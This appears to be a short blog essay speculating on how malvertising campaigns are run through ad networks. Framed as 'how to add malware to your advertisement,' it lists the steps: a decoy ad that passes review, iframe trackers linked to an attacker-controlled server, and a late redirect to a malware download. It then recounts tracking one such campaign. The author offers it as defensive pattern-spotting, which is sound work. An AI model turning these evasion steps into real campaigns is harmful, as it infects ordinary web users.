Conceptual Anatomy of a Malware publisher.
NOTICE and DISCLAIMER: This is speculation, opinion and my conceptualization related to malware distribution via advertisement networks.
Article for Discussion:
How to add malware to your advertisement running on public advertisement networks.
- Follow all guidelines as published by the ad network you are planning on running your advertisement on.
- Create a clean, professional looking advertisement without identifiable information or an actual product.
- Make your advertisement about something you believe would not be clicked on. (56Kbps modem connections, $0.75 per minute long distance.)
- Let your advertisement run for at least 30 days.
- Add 2 more ads to the network you are using repeating steps 1 - 3.
- Add a Click Tracker to the ads that is iframed and or java based.
- Ad a simple dot.gif image and html as a stats tracker and link that as an iframe to a second web server you have direct control and access.
- Allow the ads to pass quality control and inspection.
- Allow the ads to run for a few days.
- On the 5th day increase your bid to expose your advertisement to more popular websites.
- On the 5th day (35 total days) of running your ads plan on a late afternoon Friday to make the switch.
- Start by creating a redirect on load from the dot.gif image HTML tracking code.
- Allow your advertisement to run until the account balance has been reached. (zero balance)
- Abandon the ad account and the hosted server used to distribute the malware.
- Start setting up your next advertisement malware campaign.
From my experience tracking by code used and HTML patterns I do believe it's accurate to say the steps are correct. I may have missed the part where they get coffee and how often they setup but the concept is solid in my opinion.
The malware campaign that gave me very good information started from a website showing US plane flights in real-time. Not sure if that's still online today and I'm not sure if the site was setup just for malware distribution. But the server was located in the USA. The malware distribution server was located in Colombia. The ads stopped and it took about 30 days before I found a forum in the UK talking about this advertisement malware. I visited the forums and saw the 56Kbps modem advertisement which was the same as the other sites. Same virus download but the distribution server had changed to a server located in France. The same code, same exploit (Media Player) same virus but different malware server campaign. I believe the campaigns are setup to run back to back.
It took me time to discover the next setup and I only discovered it be search for the virus used. People started a forum post describing just what I was hunting for. The Advertisement Malware and the Inor Virus.
I was able to identify the same banner gif image, code that infected my workstation and how the iframe setup was coded in HTML. All the same copy and paste malware in a kit scripts.
I have read a few publications about this topic since 2005 and find that many are repeating the same discoveries with little advancement to preventing this time of wide virus infection. I believe it does go to the code level and what advertisers are allowed and disallowed to do.
With this idea or concept I plan on running a simple sample of malformed advertisements that I have discovered during normal online surfing.
It may play out to be something very interesting in the long run. I am looking to identify patterns that network administrators can look for.
Side Note: This could be a good research project for a startup group or student. Maybe just good discussion over morning coffee.